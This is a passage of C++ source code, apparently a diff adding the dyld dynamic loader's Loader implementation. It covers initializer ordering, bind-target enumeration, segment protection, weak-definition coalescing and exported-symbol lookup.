MachOAnalyzer* ma = this->analyzer(state); + dyld3::MachOAnalyzer::VMAddrConverter vmAddrConverter = ma->makeVMAddrConverter(true); + state.memoryManager.withReadOnlyMemory([&]{ + ma->forEachInitializer(diag, vmAddrConverter, ^(uint32_t offset) { + void *func = (void *)((uint8_t*)ma + offset); + if ( state.config.log.initializers ) + state.log("running initializer %p in %s\n", func, this->path()); +#if __has_feature(ptrauth_calls) + func = __builtin_ptrauth_sign_unauthenticated(func, ptrauth_key_asia, 0); +#endif + dyld3::ScopedTimer timer(DBG_DYLD_TIMING_STATIC_INITIALIZER, (uint64_t)ma, (uint64_t)func, 0); + ((Initializer)func)(state.config.process.argc, state.config.process.argv, state.config.process.envp, state.config.process.apple, state.vars); + }); + }); + +#if !TARGET_OS_EXCLAVEKIT + // don't support static terminators in arm64e binaries + if ( ma->isArch("arm64e") ) + return; + // register static terminators in old binaries, if any + typedef void (*Terminator)(void*); + ma->forEachTerminator(diag, vmAddrConverter, ^(uint32_t offset) { + Terminator func = (Terminator)((uint8_t*)ma + offset); + state.libSystemHelpers->__cxa_atexit(func, nullptr, (void*)ma); + if ( state.config.log.initializers ) + state.log("registering old style destructor %p for %s\n", func, this->path()); + }); +#endif // !TARGET_OS_EXCLAVEKIT +} + +void Loader::runInitializersBottomUp(RuntimeState& state, Array& danglingUpwards) const +{ + // do nothing if already initializers already run + if ( (const_cast(this))->beginInitializers(state) ) + return; + + //state.log("runInitializersBottomUp(%s)\n", this->path()); + + // make sure everything below this image is initialized before running my initializers + const uint32_t depCount = this->dependentCount(); + for ( uint32_t i = 0; i < depCount; ++i ) { + DependentKind childKind; + if ( Loader* child = this->dependent(state, i, &childKind) ) { + if ( childKind == DependentKind::upward ) { + // add upwards to list to process later + if ( 
!danglingUpwards.contains(child) ) + danglingUpwards.push_back(child); + } + else { + child->runInitializersBottomUp(state, danglingUpwards); + } + } + } + + // tell objc to run any +load methods in this image (done before C++ initializers) + state.notifyObjCInit(this); + + // run initializers for this image + this->runInitializers(state); +} + +void Loader::runInitializersBottomUpPlusUpwardLinks(RuntimeState& state) const +{ + //state.log("runInitializersBottomUpPlusUpwardLinks() %s\n", this->path()); + state.memoryManager.withWritableMemory([&]{ + // recursively run all initializers + STACK_ALLOC_ARRAY(const Loader*, danglingUpwards, state.loaded.size()); + this->runInitializersBottomUp(state, danglingUpwards); + + //state.log("runInitializersBottomUpPlusUpwardLinks(%s), found %d dangling upwards\n", this->path(), danglingUpwards.count()); + + // go back over all images that were upward linked, and recheck they were initialized (might be danglers) + STACK_ALLOC_ARRAY(const Loader*, extraDanglingUpwards, state.loaded.size()); + for ( const Loader* ldr : danglingUpwards ) { + //state.log("running initializers for dangling upward link %s\n", ldr->path()); + ldr->runInitializersBottomUp(state, extraDanglingUpwards); + } + if ( !extraDanglingUpwards.empty() ) { + // in case of double upward dangling images, check initializers again + danglingUpwards.resize(0); + for ( const Loader* ldr : extraDanglingUpwards ) { + //state.log("running initializers for dangling upward link %s\n", ldr->path()); + ldr->runInitializersBottomUp(state, danglingUpwards); + } + } + }); +} +#endif // BUILDING_DYLD || BUILDING_UNIT_TESTS + +// Used to build prebound targets in PrebuiltLoader. 
// Enumerates this image's bind targets, resolving each symbol and invoking `callback`
// (regular/lazy binds) or `overrideBindCallback` (opcode-based weak binds).  The two callbacks
// receive targets in the same index order the fixup info uses (asserted below).
void Loader::forEachBindTarget(Diagnostics& diag, RuntimeState& state, CacheWeakDefOverride cacheWeakDefFixup, bool allowLazyBinds,
                               void (^callback)(const ResolvedSymbol& target, bool& stop),
                               void (^overrideBindCallback)(const ResolvedSymbol& target, bool& stop)) const
{
    this->withLayout(diag, state, ^(const mach_o::Layout &layout) {
        mach_o::Fixups fixups(layout);

        __block unsigned targetIndex = 0;
        __block unsigned overrideBindTargetIndex = 0;
#if SUPPORT_PRIVATE_EXTERNS_WORKAROUND
        intptr_t slide = this->analyzer(state)->getSlide();
#else
        intptr_t slide = 0;
#endif
        fixups.forEachBindTarget(diag, allowLazyBinds, slide, ^(const mach_o::Fixups::BindTargetInfo& info, bool& stop) {
            // Regular and lazy binds
            assert(targetIndex == info.targetIndex);
            ResolvedSymbol targetInfo = this->resolveSymbol(diag, state, info.libOrdinal, info.symbolName, info.weakImport, info.lazyBind, cacheWeakDefFixup);
            targetInfo.targetRuntimeOffset += info.addend;
            callback(targetInfo, stop);
            if ( diag.hasError() )
                stop = true;
            ++targetIndex;
        }, ^(const mach_o::Fixups::BindTargetInfo& info, bool& stop) {
            // Opcode based weak binds
            assert(overrideBindTargetIndex == info.targetIndex);
            Diagnostics weakBindDiag; // failures aren't fatal here
            ResolvedSymbol targetInfo = this->resolveSymbol(weakBindDiag, state, info.libOrdinal, info.symbolName, info.weakImport, info.lazyBind, cacheWeakDefFixup);
            if ( weakBindDiag.hasError() ) {
                // In dyld2, it was also ok for a weak bind to be missing.  Then we would let the bind/rebase on this
                // address handle it
                targetInfo.targetLoader = nullptr;
                targetInfo.targetRuntimeOffset = 0;
                targetInfo.kind = ResolvedSymbol::Kind::bindToImage;
                targetInfo.isCode = false;
                targetInfo.isWeakDef = false;
                targetInfo.isMissingFlatLazy = false;
            } else {
                targetInfo.targetRuntimeOffset += info.addend;
            }
            overrideBindCallback(targetInfo, stop);
            ++overrideBindTargetIndex;
        });
    });
}

// True when this image has DATA_CONST-style segments that dyld must re-protect after fixups;
// dylibs in the dyld cache are excluded (the cache manages their protections).
bool Loader::hasConstantSegmentsToProtect() const
{
    return this->hasReadOnlyData && !this->dylibInDyldCache;
}

#if BUILDING_DYLD || BUILDING_UNIT_TESTS
// mprotect()s this image's read-only-data segments back to read-only (after fixups are applied).
void Loader::makeSegmentsReadOnly(RuntimeState& state) const
{
    const MachOAnalyzer* ma = this->analyzer(state);
    uintptr_t slide = ma->getSlide();
    ma->forEachSegment(^(const MachOAnalyzer::SegmentInfo& segInfo, bool& stop) {
        if ( segInfo.readOnlyData ) {
    #if TARGET_OS_EXCLAVEKIT
            //TODO: EXCLAVES
            (void)slide;
    #else
            const uint8_t* start = (uint8_t*)(segInfo.vmAddr + slide);
            size_t size = (size_t)segInfo.vmSize;
            state.config.syscall.mprotect((void*)start, size, PROT_READ);
            if ( state.config.log.segments )
                state.log("mprotect 0x%012lX->0x%012lX to read-only\n", (long)start, (long)start + size);
    #endif
        }
    });
}

// mprotect()s this image's read-only-data segments to read-write (so fixups can be applied).
// Mirror image of makeSegmentsReadOnly().
void Loader::makeSegmentsReadWrite(RuntimeState& state) const
{
    const MachOAnalyzer* ma = this->analyzer(state);
    uintptr_t slide = ma->getSlide();
    ma->forEachSegment(^(const MachOAnalyzer::SegmentInfo& segInfo, bool& stop) {
        if ( segInfo.readOnlyData ) {
    #if TARGET_OS_EXCLAVEKIT
            //TODO: EXCLAVES
            (void)slide;
    #else
            const uint8_t* start = (uint8_t*)(segInfo.vmAddr + slide);
            size_t size = (size_t)segInfo.vmSize;
            state.config.syscall.mprotect((void*)start, size, PROT_READ | PROT_WRITE);
            if ( state.config.log.segments )
                state.log("mprotect 0x%012lX->0x%012lX to read-write\n", (long)start, (long)start + size);
    #endif
        }
    });
}

// Logs the slid address range and protections of each segment of a dylib that is
// mapped as part of the dyld shared cache.
void Loader::logSegmentsFromSharedCache(RuntimeState& state) const
{
    state.log("Using mapping in dyld cache for %s\n", this->path());
    uint64_t cacheSlide = state.config.dyldCache.slide;
    this->loadAddress(state)->forEachSegment(^(const MachOLoaded::SegmentInfo& info, bool& stop) {
        state.log("%14s (%c%c%c) 0x%012llX->0x%012llX \n", info.segName,
                  (info.readable() ? 'r' : '.'), (info.writable() ? 'w' : '.'), (info.executable() ? 'x' : '.'),
                  info.vmAddr + cacheSlide, info.vmAddr + cacheSlide + info.vmSize);
    });
}

// FIXME: This only handles weak-defs and does not look for non-weaks that override weak-defs
// Seeds state.weakDefMap with the weak-def exports of the newly loaded images, first
// definition wins (entries already present are not replaced).
void Loader::addWeakDefsToMap(RuntimeState& state, const std::span& newLoaders)
{
    for (const Loader* ldr : newLoaders) {
        const MachOAnalyzer* ma = ldr->analyzer(state);
        if ( (ma->flags & MH_WEAK_DEFINES) == 0 )
            continue;
        if ( ldr->hiddenFromFlat() )
            continue;

        // NOTE: using the nlist is faster to scan for weak-def exports, than iterating the exports trie
        Diagnostics diag;
        uint64_t baseAddress = ma->preferredLoadAddress();
        ma->forEachGlobalSymbol(diag, ^(const char* symbolName, uint64_t n_value, uint8_t n_type, uint8_t n_sect, uint16_t n_desc, bool& stop) {
            if ( (n_desc & N_WEAK_DEF) != 0 ) {
                // only add if not already in map
                const auto& pos = state.weakDefMap->find(symbolName);
                if ( pos == state.weakDefMap->end() ) {
                    WeakDefMapValue mapEntry;
                    mapEntry.targetLoader = ldr;
                    mapEntry.targetRuntimeOffset = n_value - baseAddress;
                    mapEntry.isCode = false; // unused
                    mapEntry.isWeakDef = true;
                    state.weakDefMap->operator[](symbolName) = mapEntry;
                }
            }
        });
    }
}
#endif // BUILDING_DYLD || BUILDING_UNIT_TESTS

// Resolves one bind target to a (loader, runtime-offset) pair.  `libOrdinal` selects the
// search policy: a positive ordinal names a direct dependent; the BIND_SPECIAL_DYLIB_*
// ordinals select self, the main executable, flat-namespace lookup, or weak-def coalescing.
// On failure, behavior depends on the bind: weak-imports bind to NULL, lazy binds are pointed
// at libdyld's missing-symbol abort, otherwise an error is reported through `diag`.
Loader::ResolvedSymbol Loader::resolveSymbol(Diagnostics& diag, RuntimeState& state, int libOrdinal, const char* symbolName,
                                             bool weakImport, bool lazyBind, CacheWeakDefOverride patcher, bool buildingCache) const
{
    __block ResolvedSymbol result = { nullptr, symbolName, 0, ResolvedSymbol::Kind::bindAbsolute, false, false };
    if ( (libOrdinal > 0) && ((unsigned)libOrdinal <= this->dependentCount()) ) {
        // ordinary two-level namespace bind: falls through to the static-link search below
        result.targetLoader = dependent(state, libOrdinal - 1);
    }
    else if ( libOrdinal == BIND_SPECIAL_DYLIB_SELF ) {
        result.targetLoader = this;
    }
    else if ( libOrdinal == BIND_SPECIAL_DYLIB_MAIN_EXECUTABLE ) {
        result.targetLoader = state.mainExecutableLoader;
    }
    else if ( libOrdinal == BIND_SPECIAL_DYLIB_FLAT_LOOKUP ) {
        // flat namespace: first loaded image exporting the symbol wins
        __block bool found = false;
        state.locks.withLoadersReadLock(^{
            for ( const Loader* ldr : state.loaded ) {
                // flat lookup can look in self, even if hidden
                if ( ldr->hiddenFromFlat() && (ldr != this) )
                    continue;
                if ( ldr->hasExportedSymbol(diag, state, symbolName, Loader::shallow, &result) ) {
                    found = true;
                    return;
                }
            }
        });
        if ( found ) {
            // record the dynamic dependency so the symbol we found does not get unloaded from under us
            if ( result.targetLoader != this )
                state.addDynamicReference(this, result.targetLoader);
        }
        else {
            if ( weakImport ) {
                // ok to be missing, bind to NULL
                result.kind = ResolvedSymbol::Kind::bindAbsolute;
                result.targetRuntimeOffset = 0;
            }
            else if ( lazyBind && (state.libdyldMissingSymbolRuntimeOffset != 0) ) {
                // lazy bound symbols can be bound to __dyld_missing_symbol_abort
                result.targetLoader = state.libdyldLoader;
                result.targetSymbolName = symbolName;
                result.targetRuntimeOffset = (uintptr_t)state.libdyldMissingSymbolRuntimeOffset;
                result.kind = ResolvedSymbol::Kind::bindToImage;
                result.isCode = false; // only used for arm64e which uses trie not nlist
                result.isWeakDef = false;
                result.isMissingFlatLazy = true;
            }
            else {
                // missing symbol, but not weak-import or lazy-bound, so error
                diag.error("symbol not found in flat namespace '%s'", symbolName);
            }
        }
        return result;
    }
    else if ( libOrdinal == BIND_SPECIAL_DYLIB_WEAK_LOOKUP ) {
        // weak-def coalescing: pick one canonical definition across all loaded images
        const bool verboseWeak = false;
        __block bool foundFirst = false;
#if BUILDING_CACHE_BUILDER
        if ( buildingCache ) {
            // when dylibs in cache are built, we don't have real load order, so do weak binding differently
            if ( verboseWeak )
                state.log("looking for weak-def symbol %s\n", symbolName);

            // look first in /usr/lib/libc++, most will be here
            for ( const Loader* ldr : state.loaded ) {
                ResolvedSymbol libcppResult;
                if ( ldr->mf(state)->hasWeakDefs() && (strncmp(ldr->path(), "/usr/lib/libc++.", 16) == 0) ) {
                    if ( ldr->hasExportedSymbol(diag, state, symbolName, Loader::shallow, &libcppResult) ) {
                        if ( verboseWeak )
                            state.log(" using %s from libc++.dylib\n", symbolName);
                        return libcppResult;
                    }
                }
            }

            // if not found, try looking in the images itself, most custom weak-def symbols have a copy in the image itself
            ResolvedSymbol selfResult;
            if ( this->hasExportedSymbol(diag, state, symbolName, Loader::shallow, &selfResult) ) {
                if ( verboseWeak )
                    state.log(" using %s from self %s\n", symbolName, this->path());
                return selfResult;
            }

            // if this image directly links with something that also defines this weak-def, use that because we know it will be loaded
            const uint32_t depCount = this->dependentCount();
            for ( uint32_t i = 0; i < depCount; ++i ) {
                Loader::DependentKind depKind;
                if ( Loader* depLoader = this->dependent(state, i, &depKind) ) {
                    if ( depKind != Loader::DependentKind::upward ) {
                        ResolvedSymbol depResult;
                        if ( depLoader->hasExportedSymbol(diag, state, symbolName, Loader::staticLink, &depResult) ) {
                            if ( verboseWeak )
                                state.log(" using %s from dependent %s\n", symbolName, depLoader->path());
                            return depResult;
                        }
                    }
                }
            }

            // no impl??
            diag.error("weak-def symbol (%s) not found in dyld cache", symbolName);
            return result;
        }
        else // fall into app launch case
#endif
        state.locks.withLoadersReadLock(^{
            if ( verboseWeak )
                state.log("looking for weak-def symbol %s\n", symbolName);
            state.weakDefResolveSymbolCount++;
            // 5000 is a guess that "this is a large C++ app" and could use a map to speed up coalescing
            if ( (state.weakDefResolveSymbolCount > 5000) && (state.weakDefMap == nullptr) ) {
                state.weakDefMap = new (state.persistentAllocator.malloc(sizeof(WeakDefMap))) WeakDefMap();
            }
            if ( state.weakDefMap != nullptr ) {
                // fast path: previously coalesced symbol found in the cache map
                const auto& pos = state.weakDefMap->find(symbolName);
                if ( (pos != state.weakDefMap->end()) && (pos->second.targetLoader != nullptr) ) {
                    //state.log("resolveSymbol(%s) found in map\n", symbolName);
                    result.targetLoader = pos->second.targetLoader;
                    result.targetSymbolName = symbolName;
                    result.targetRuntimeOffset = pos->second.targetRuntimeOffset;
                    result.kind = ResolvedSymbol::Kind::bindToImage;
                    result.isCode = pos->second.isCode;
                    result.isWeakDef = pos->second.isWeakDef;
                    result.isMissingFlatLazy = false;
                    if ( verboseWeak )
                        state.log(" found %s in map, using impl from %s\n", symbolName, result.targetLoader->path());
                    foundFirst = true;
                    return;
                }
            }

            // Keep track of results from the cache to be processed at the end, once
            // we've chosen a canonical definition
            struct CacheLookupResult {
                const Loader* targetLoader = nullptr;
                uint64_t targetRuntimeOffset = 0;
            };
            STACK_ALLOC_ARRAY(CacheLookupResult, cacheResults, state.loaded.size());

            bool weakBindOpcodeClient = !this->dylibInDyldCache && this->mf(state)->hasOpcodeFixups();
            for ( const Loader* ldr : state.loaded ) {
                if ( ldr->mf(state)->hasWeakDefs() ) {
                    ResolvedSymbol thisResult;
                    // weak coalescing ignores hidden images
                    if ( ldr->hiddenFromFlat() )
                        continue;
                    if ( ldr->hasExportedSymbol(diag, state, symbolName, Loader::shallow, &thisResult) ) {
                        if ( weakBindOpcodeClient && !thisResult.isWeakDef && ldr->dylibInDyldCache ) {
                            // rdar://75956202 ignore non-weak symbols in shared cache when opcode based binary is looking for symbols to coalesce
                            continue;
                        }
                        if ( thisResult.targetLoader->dylibInDyldCache && !ldr->hasBeenFixedUp(state) )
                            cacheResults.push_back({ thisResult.targetLoader, thisResult.targetRuntimeOffset });

                        // record first implementation found, but keep searching
                        if ( !foundFirst ) {
                            foundFirst = true;
                            result = thisResult;
                            if ( verboseWeak )
                                state.log(" using %s in %s\n", symbolName, thisResult.targetLoader->path());
                        }
                        if ( !thisResult.isWeakDef && result.isWeakDef ) {
                            // non-weak wins over previous weak-def
                            // we don't stop search because we need to see if this overrides anything in the dyld cache
                            result = thisResult;
                            if ( verboseWeak )
                                state.log(" using non-weak %s in %s\n", symbolName, thisResult.targetLoader->path());
                        }
                    }
                }
            }
            // if not found anywhere else and this image is hidden, try looking in itself
            if ( !foundFirst && this->hiddenFromFlat() ) {
                if ( verboseWeak )
                    state.log(" did not find unhidden %s, trying self (%s)\n", symbolName, this->leafName());
                ResolvedSymbol thisResult;
                if ( this->hasExportedSymbol(diag, state, symbolName, Loader::shallow, &thisResult) ) {
                    foundFirst = true;
                    result = thisResult;
                }
            }

            // Patch the cache if we chose a definition which overrides it
            if ( foundFirst && !cacheResults.empty() && !result.targetLoader->dylibInDyldCache && (patcher != nullptr) ) {
                uint64_t patchedCacheOffset = 0;
                for ( const CacheLookupResult& cacheResult : cacheResults ) {
                    // We have already found the impl which we want all clients to use.
                    // But, later in load order we see something in the dyld cache that also implements
                    // this symbol, so we need to change all caches uses of that to use the found one instead.
                    const MachOFile* cacheMF = cacheResult.targetLoader->mf(state);
                    uint32_t cachedOverriddenDylibIndex;
                    if ( state.config.dyldCache.findMachHeaderImageIndex(cacheMF, cachedOverriddenDylibIndex) ) {
                        // Use VMAddr's as the cache may not exist if we are in the builder
                        uint64_t cacheOverriddenExportVMAddr = cacheMF->preferredLoadAddress() + cacheResult.targetRuntimeOffset;
                        uint64_t cacheOverriddenExportOffset = cacheOverriddenExportVMAddr - state.config.dyldCache.unslidLoadAddress;
                        if ( cacheOverriddenExportOffset != patchedCacheOffset ) {
                            // because of re-exports, same cacheOffset shows up in multiple dylibs. Only call patcher once per
                            if ( verboseWeak )
                                state.log(" found use of %s in cache, need to override: %s\n", symbolName, cacheResult.targetLoader->path());
                            patcher(cachedOverriddenDylibIndex, (uint32_t)cacheResult.targetRuntimeOffset, result);
                            patchedCacheOffset = cacheOverriddenExportOffset;
                        }
                    }
                }
            }
        });
        if ( foundFirst ) {
            // if a c++ dylib weak-def binds to another dylibs, record the dynamic dependency
            if ( result.targetLoader != this )
                state.addDynamicReference(this, result.targetLoader);
            // if we are using a map to cache weak-def resolution, add to map
            if ( (state.weakDefMap != nullptr) && !result.targetLoader->hiddenFromFlat() ) {
                WeakDefMapValue mapEntry;
                mapEntry.targetLoader = result.targetLoader;
                mapEntry.targetRuntimeOffset = result.targetRuntimeOffset;
                mapEntry.isCode = result.isCode;
                mapEntry.isWeakDef = result.isWeakDef;
                state.weakDefMap->operator[](symbolName) = mapEntry;
            }
        }
        else {
            if ( weakImport ) {
                // ok to be missing, bind to NULL
                result.kind = ResolvedSymbol::Kind::bindAbsolute;
                result.targetRuntimeOffset = 0;
            }
            else {
                diag.error("weak-def symbol not found '%s'", symbolName);
            }
        }
        return result;
    }
    else {
        diag.error("unknown library ordinal %d in %s when binding '%s'", libOrdinal, path(), symbolName);
        return result;
    }
    // static-link search: reached only by the branches above that fall through
    // (positive ordinal, SELF, MAIN_EXECUTABLE)
    if ( result.targetLoader != nullptr ) {
        STACK_ALLOC_ARRAY(const Loader*, alreadySearched, state.loaded.size());
        if ( result.targetLoader->hasExportedSymbol(diag, state, symbolName, Loader::staticLink, &result, &alreadySearched) ) {
            return result;
        }
    }
    if ( weakImport ) {
        // ok to be missing, bind to NULL
        result.kind = ResolvedSymbol::Kind::bindAbsolute;
        result.targetRuntimeOffset = 0;
    }
    else if ( lazyBind && (state.libdyldMissingSymbolRuntimeOffset != 0) ) {
        // missing lazy binds are bound to abort
        result.targetLoader = state.libdyldLoader;
        result.targetSymbolName = symbolName;
        result.targetRuntimeOffset = (uintptr_t)state.libdyldMissingSymbolRuntimeOffset;
        result.kind = ResolvedSymbol::Kind::bindToImage;
        result.isCode = false; // only used for arm64e which uses trie not nlist
        result.isWeakDef = false;
        result.isMissingFlatLazy = false;
    }
    else {
        // if libSystem.dylib has not been initialized yet, then the missing symbol is during launch and need to save that info
        const char* expectedInDylib = "unknown";
        if ( result.targetLoader != nullptr )
            expectedInDylib = result.targetLoader->path();
#if BUILDING_DYLD && !TARGET_OS_EXCLAVEKIT
        if ( !state.libSystemInitialized() ) {
            state.setLaunchMissingSymbol(symbolName, expectedInDylib, this->path());
        }
#endif
        // rdar://79796526 add UUID to error message
        char fromUuidStr[64];
        this->getUuidStr(state, fromUuidStr);
        char expectedUuidStr[64];
        if ( result.targetLoader != nullptr )
            result.targetLoader->getUuidStr(state, expectedUuidStr);
        else
            strlcpy(expectedUuidStr, "no uuid", sizeof(expectedUuidStr));

        // rdar://15648948 (On fatal errors, check binary's min-OS version and note if from the future)
        Diagnostics tooNewBinaryDiag;
        this->tooNewErrorAddendum(tooNewBinaryDiag, state);

        diag.error("Symbol not found: %s\n Referenced from: <%s> %s%s\n Expected in: <%s> %s",
                   symbolName, fromUuidStr, this->path(), tooNewBinaryDiag.errorMessageCStr(), expectedUuidStr, expectedInDylib);
    }
    return result;
}

// if the binary for this Loader is newer than dyld, then we are trying to run a too new binary
// Appends an addendum to `diag` when this image's minOS (for dyld's own platform) is newer
// than the minOS dyld itself was built for.
void Loader::tooNewErrorAddendum(Diagnostics& diag, RuntimeState& state) const
{
    __block Platform dyldPlatform = Platform::unknown;
    __block uint32_t dyldMinOS = 0;
    // &__dso_handle is dyld's own mach_o header
    ((MachOFile*)(&__dso_handle))->forEachSupportedPlatform(^(Platform plat, uint32_t minOS, uint32_t sdk) {
        dyldPlatform = plat;
        dyldMinOS = minOS;
    });
    this->mf(state)->forEachSupportedPlatform(^(Platform plat, uint32_t minOS, uint32_t sdk) {
        if ( (plat == dyldPlatform) && (minOS > dyldMinOS) ) {
            char versionString[32];
            MachOFile::packedVersionToString(minOS, versionString);
            diag.error(" (built for %s %s which is newer than running OS)",
                       MachOFile::platformName(dyldPlatform), versionString);
        }
    });
}

// Looks up `symbolName` in this image's exports (trie if present, else nlist scan, else
// pseudo-dylib callback), following re-exports according to `mode`, and fills in `result`.
// `alreadySearched` prevents revisiting loaders when following re-export chains.
bool Loader::hasExportedSymbol(Diagnostics& diag, RuntimeState& state, const char* symbolName, ExportedSymbolMode mode, ResolvedSymbol* result, dyld3::Array* alreadySearched) const
{
    // don't search twice
    if ( alreadySearched != nullptr ) {
        for ( const Loader* im : *alreadySearched ) {
            if ( im == this )
                return false;
        }
        alreadySearched->push_back(this);
    }
    // translate the lookup mode into the individual search knobs
    bool              canSearchDependents;
    bool              searchNonReExports;
    bool              searchSelf;
    ExportedSymbolMode depsMode;
    switch ( mode ) {
        case staticLink:
            canSearchDependents = true;
            searchNonReExports = false;
            searchSelf = true;
            depsMode = staticLink;
            break;
        case shallow:
            canSearchDependents = false;
            searchNonReExports = false;
            searchSelf = true;
            depsMode = shallow;
            break;
        case dlsymNext:
            canSearchDependents = true;
            searchNonReExports = true;
            searchSelf = false;
            depsMode = dlsymSelf;
            break;
        case dlsymSelf:
            canSearchDependents = true;
            searchNonReExports = true;
            searchSelf = true;
            depsMode = dlsymSelf;
            break;
    }

    // The cache builder can't use runtimeOffset's to get the exports trie.  Instead use the layout from
    // the builder
    __block const uint8_t* trieStart = nullptr;
    __block const uint8_t* trieEnd = nullptr;
    __block bool hasTrie = false;
#if SUPPORT_VM_LAYOUT
    const MachOLoaded* ml = this->loadAddress(state);
    //state.log("Loader::hasExportedSymbol(%s) this=%s\n", symbolName, this->path());
    uint64_t trieRuntimeOffset;
    uint32_t trieSize;
    if ( this->getExportsTrie(trieRuntimeOffset, trieSize) ) {
        trieStart = (uint8_t*)ml + trieRuntimeOffset;
        trieEnd = trieStart + trieSize;
        hasTrie = true;
    }
#else
    this->withLayout(diag, state, ^(const mach_o::Layout &layout) {
        if ( layout.linkedit.exportsTrie.hasValue() ) {
            trieStart = layout.linkedit.exportsTrie.buffer;
            trieEnd = trieStart + layout.linkedit.exportsTrie.bufferSize;
            hasTrie = true;
        }
    });
#endif

    if ( hasTrie ) {
        const uint8_t* node = MachOLoaded::trieWalk(diag, trieStart, trieEnd, symbolName);
        //state.log(" trieStart=%p, trieSize=0x%08X, node=%p, error=%s\n", trieStart, trieSize, node, diag.errorMessage());
        if ( (node != nullptr) && searchSelf ) {
            const uint8_t* p = node;
            const uint64_t flags = MachOLoaded::read_uleb128(diag, p, trieEnd);
            if ( flags & EXPORT_SYMBOL_FLAGS_REEXPORT ) {
                // re-export from another dylib, lookup there
                const uint64_t ordinal = MachOLoaded::read_uleb128(diag, p, trieEnd);
                const char* importedName = (char*)p;
                bool nameChanged = false;
                if ( importedName[0] == '\0' ) {
                    importedName = symbolName;
                } else if ( strcmp(importedName, symbolName) != 0 ) {
                    nameChanged = true;   // re-export under a different (aliased) name
                }
                if ( (ordinal == 0) || (ordinal > this->dependentCount()) ) {
                    diag.error("re-export ordinal %lld in %s out of range for %s", ordinal, this->path(), symbolName);
                    return false;
                }
                uint32_t depIndex = (uint32_t)(ordinal - 1);
                DependentKind depKind;
                if ( Loader* depLoader = this->dependent(state, depIndex, &depKind) ) {
                    // Explicitly promote to a ::staticLink resolution when looking for a reexported symbol in ::shallow mode.
                    // The symbol might be located in one of the reexported libraries
                    // of the dependent. If the caller checks all loaders with
                    // ::shallow mode it won't be able to find an aliased symbol,
                    // because it will only look for the original name.
                    if ( nameChanged && mode == Loader::shallow )
                        mode = Loader::staticLink;
                    if ( nameChanged && alreadySearched ) {
                        // As we are changing the symbol name we are looking for, use a new alreadySearched. The existing
                        // alreadySearched may include loaders we have searched before for the old name, but not the new one,
                        // and we want to check them again
                        STACK_ALLOC_ARRAY(const Loader*, nameChangedAlreadySearched, state.loaded.size());
                        return depLoader->hasExportedSymbol(diag, state, importedName, mode, result, &nameChangedAlreadySearched);
                    }
                    return depLoader->hasExportedSymbol(diag, state, importedName, mode, result, alreadySearched);
                }
                return false; // re-exported symbol from weak-linked dependent which is missing
            }
            else {
                if ( diag.hasError() )
                    return false;
                bool isAbsoluteSymbol = ((flags & EXPORT_SYMBOL_FLAGS_KIND_MASK) == EXPORT_SYMBOL_FLAGS_KIND_ABSOLUTE);
                result->targetLoader = this;
                result->targetSymbolName = symbolName;
                result->targetRuntimeOffset = (uintptr_t)MachOLoaded::read_uleb128(diag, p, trieEnd);
                result->kind = isAbsoluteSymbol ? ResolvedSymbol::Kind::bindAbsolute : ResolvedSymbol::Kind::bindToImage;
                result->isCode = this->mf(state)->inCodeSection((uint32_t)(result->targetRuntimeOffset));
                result->isWeakDef = (flags & EXPORT_SYMBOL_FLAGS_WEAK_DEFINITION);
                result->isMissingFlatLazy = false;
                return true;
            }
        }
    }
    else {
        // try old slow way: no exports trie, scan the global symbols in the nlist
        const mach_o::MachOFileRef fileRef = this->mf(state);
        __block bool found = false;
        this->withLayout(diag, state, ^(const mach_o::Layout& layout) {
            mach_o::SymbolTable symbolTable(layout);

            symbolTable.forEachGlobalSymbol(diag, ^(const char* n_name, uint64_t n_value, uint8_t n_type,
                                                    uint8_t n_sect, uint16_t n_desc, bool& stop) {
                if ( ((n_type & N_TYPE) == N_SECT) && ((n_type & N_EXT) != 0) ) {
                    if ( strcmp(n_name, symbolName) == 0 ) {
                        result->targetLoader = this;
                        result->targetSymbolName = symbolName;
                        result->targetRuntimeOffset = (uintptr_t)(n_value - fileRef->preferredLoadAddress());
                        result->kind = ResolvedSymbol::Kind::bindToImage;
                        result->isCode = false; // only used for arm64e which uses trie not nlist
                        result->isWeakDef = (n_desc & N_WEAK_DEF);
                        result->isMissingFlatLazy = false;
                        stop = true;
                        found = true;
                    }
                }
            });
        });
        if ( found )
            return true;
    }

    if ( const JustInTimeLoader* jitThis = this->isJustInTimeLoader() ) {
        // pseudo-dylibs resolve symbols through a client-supplied callback
        if ( const PseudoDylib *pd = jitThis->pseudoDylib() ) {
            const char *symbolNames[] = { symbolName };
            void *addrs[1] = { nullptr };
            _dyld_pseudodylib_symbol_flags flags[1] = { DYLD_PSEUDODYLIB_SYMBOL_FLAGS_NONE };
            if (char *errMsg = pd->lookupSymbols(symbolNames, addrs, flags)) {
                diag.error("pseudo-dylib lookup error: %s", errMsg);
                pd->disposeErrorMessage(errMsg);
                return false;
            }
            if ( flags[0] & DYLD_PSEUDODYLIB_SYMBOL_FLAGS_FOUND ) {
                result->targetLoader = this;
                result->targetSymbolName = symbolName;
                result->targetRuntimeOffset = (uintptr_t)addrs[0] - (uintptr_t)this->mf(state);
                result->kind = ResolvedSymbol::Kind::bindToImage;
                result->isCode =
flags[0] & DYLD_PSEUDODYLIB_SYMBOL_FLAGS_CALLABLE; + result->isWeakDef = flags[0] & DYLD_PSEUDODYLIB_SYMBOL_FLAGS_WEAK_DEF; + result->isMissingFlatLazy = false; + return true; + } + } + } + + if ( canSearchDependents ) { + // Search re-exported dylibs + const uint32_t depCount = this->dependentCount(); + for ( uint32_t i = 0; i < depCount; ++i ) { + Loader::DependentKind depKind; + if ( Loader* depLoader = this->dependent(state, i, &depKind) ) { + //state.log("dep #%d of %p is %d %p (%s %s)\n", i, this, (int)depKind, depLoader, this->path(), depLoader->path()); + if ( (depKind == Loader::DependentKind::reexport) || (searchNonReExports && (depKind != Loader::DependentKind::upward)) ) { + if ( depLoader->hasExportedSymbol(diag, state, symbolName, depsMode, result, alreadySearched) ) + return true; + } + } + } + } + return false; +} + +#if BUILDING_DYLD || BUILDING_UNIT_TESTS +uintptr_t Loader::resolvedAddress(RuntimeState& state, const ResolvedSymbol& symbol) +{ + switch ( symbol.kind ) { + case ResolvedSymbol::Kind::rebase: + case ResolvedSymbol::Kind::bindToImage: + return (uintptr_t)symbol.targetLoader->loadAddress(state) + (uintptr_t)symbol.targetRuntimeOffset; + case ResolvedSymbol::Kind::bindAbsolute: + return (uintptr_t)symbol.targetRuntimeOffset; + } +} +#endif // BUILDING_DYLD || BUILDING_UNIT_TESTS + + + +uintptr_t Loader::interpose(RuntimeState& state, uintptr_t value, const Loader* forLoader) +{ + // ignore interposing on a weak function that does not exist + if ( value == 0 